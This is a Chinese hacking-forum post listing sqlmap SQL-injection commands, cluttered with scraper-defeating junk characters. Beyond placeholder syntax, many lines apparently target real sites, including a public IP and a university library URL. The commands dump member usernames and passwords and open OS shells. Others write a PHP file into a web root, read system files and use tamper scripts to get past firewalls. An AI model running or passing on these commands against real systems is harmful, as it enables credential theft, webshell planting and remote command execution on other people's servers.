找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2054|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
3 A8 M& J$ I7 s- C6 w2 [) P! _5 ]% }% y5 I+ ^8 M# O& H0 k; S9 s
update :::::>     in the folder   after  execute    following   order : svn update
( c; \& X( }1 T" c6 G; l, p
* m9 t/ T: Z8 P/ O/ I8 |% b" Xsqlmap.py -r 1.txt --current-db
9 S- K7 S; x2 ^! b' Y- |6 \, d/ p' m' }" a
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
- \! U: e  b& k& e
& g# L+ G% G3 |  I1 r==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
2 T. {6 o. O0 Q/ U% y猜解数据库
+ E, R- q3 z) l0 J5 w$ L./sqlmap.py -u "injection-url" --dbs2 g, _0 b. b- |. C5 k9 w
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"" N: R1 {8 ~1 U, X5 i( L
: K" n- A6 L: Q8 Y: ?7 x0 F/ o- E
猜解表名
9 q" h* o& p: z; v./sqlmap.py -u "injection-url" -D database_name --tables; O2 k4 _; j$ A; _8 n

7 R8 R$ E: ~  @3 T+ vsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"/ |( \/ g/ V# d7 M* b9 n
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
( S: J- s# m; L! Y+ _: {8 _5 }" H5 A" W* J& s6 ~: q
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump' e! V3 ~: k& O
& G# i9 I7 d4 @
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"% R) x4 j: c, k
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
/ u' t5 J9 x" ~7 M' {- X, e& \% osqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
) w  ?0 _8 Q: P: b" {9 Tsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"9 @3 E( V* N8 K* ^
1 E* i6 E5 L# t$ h! w- }/ `
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
  |  }1 x% F7 k, Ssqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"! C* c4 F* |! E. @' o6 e9 X% \1 [
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"1 z( u( E7 w; G, c! T% d
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py". L8 {1 K& |  S8 L  `& ]- h: B3 T0 }
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
. H/ q5 \0 ?  Q
2 r7 c+ R( O9 e5 f, P8 M$ u* isqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了1 S/ X% x3 Q* o6 e! |+ d
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py": o2 f  G  J. M. B, J7 U0 g
7 ?& e% H) ~% t9 w( Y+ X
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"! r7 b# k* v5 H; ~# g3 W9 e, E
猜解列名
& m0 H# r4 U3 e./sqlmap.py -u "injection-url" -D database_name -T table_name --columns1 C! W5 s9 b* p/ w6 e+ C
: x; T8 j1 o3 P! _. |
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
" u+ c' e& B8 z+ r9 h, n$ ]sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"   w, v( @3 n/ [4 R. B+ s/ G0 C
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py": s0 i  u) y2 Q" s0 K* z6 U

; e" T! b3 P. m" ^2 W3 Xsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 ^. i1 W$ F8 i$ m: F+ O0 h2 l. k&submit=Go
$ X5 T$ Z  L8 Z) ?4 b& {+ p0 @6 ^$ \猜解值) ?/ S8 _7 D6 T* F% g& f8 P
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump7 c( U) a( t8 E; l
========================================================# M3 O/ d: X) E4 l2 H: g
搜索表名中包括mana字符的# a: \" f5 y# m' d8 j; b
/sqlmap.py -u "injection-url" -T mana --search3 X. X1 j( v  _3 z- B: x! ~# c
返回一个交互式sql shell8 V- |" m2 L% Q! g. \4 Z, Q
/sqlmap.py -u "injection-url" --sql-shell# T  u9 K/ }  Y8 J& J, F8 r2 r( ~& L
读取指定文件(需权限)
7 L* r9 [1 T! U( \1 h/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"0 {" f" H; D/ P! M# {, u3 v* R
查看当前 用户 及 数据库 0 [/ ~# N' I* B8 n: h" ^
/sqlmap.py -u "injection-url" --current-user --current-db
7 B6 ?! {' a- l  A% t9 c本地文件 写入 远程目标绝对路径
# I  f) F3 _% t6 L' f( j/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径. V. @4 d4 e8 R9 J+ T
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" . l2 A; B  q  S
+ _! h: c4 c/ b+ R# O
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
3 p9 N2 H1 \* V& h查看某用的权限# _5 h, o+ r* b  t( O1 _0 a1 X0 _
/sqlmap.py -u "injection-url" --privileges -U root2 `$ @8 ^7 S1 f2 s
查看当前用户是否为dba( O5 R% m# z& j5 f
/sqlmap.py -u "injection-url" --is-dba
( A! |+ O/ ^. g8 I9 L: F+ L读取所有数据库用户或指定数据库用户的密码! ^; n3 [% {; g1 v
sqlmap.py -r 1.txt --users --passwords* Q: ~3 x" p2 M- v. c
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
! i* W0 }. X' p9 t0 }6 E0 m$ f
+ A, E( \& y! }/sqlmap.py -u "injection-url" --passwords -U root1 g" [+ I# r5 q9 n

- v* I' |. i! D' W5 r! M5 @( E--start&&--stop 与 --first&&--last 的区别8 L! |7 @  [/ ?. }9 m) O4 W5 j  D
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)6 H$ J8 E5 B4 j0 _1 U! Z
2 F% i5 f, L  Y, @& h
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)7 T% K" ?0 |2 k. C6 g% m
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
( o3 B% p8 L" D) Y! L( P/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns5 A* H" z" d2 W3 [  o
7 W9 f3 r2 J: m  N& O* o( c5 p
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% _) O- G' [4 J% N# b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"- `  L, i% ?4 x( n3 ^0 W

3 A# l' I: S) G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表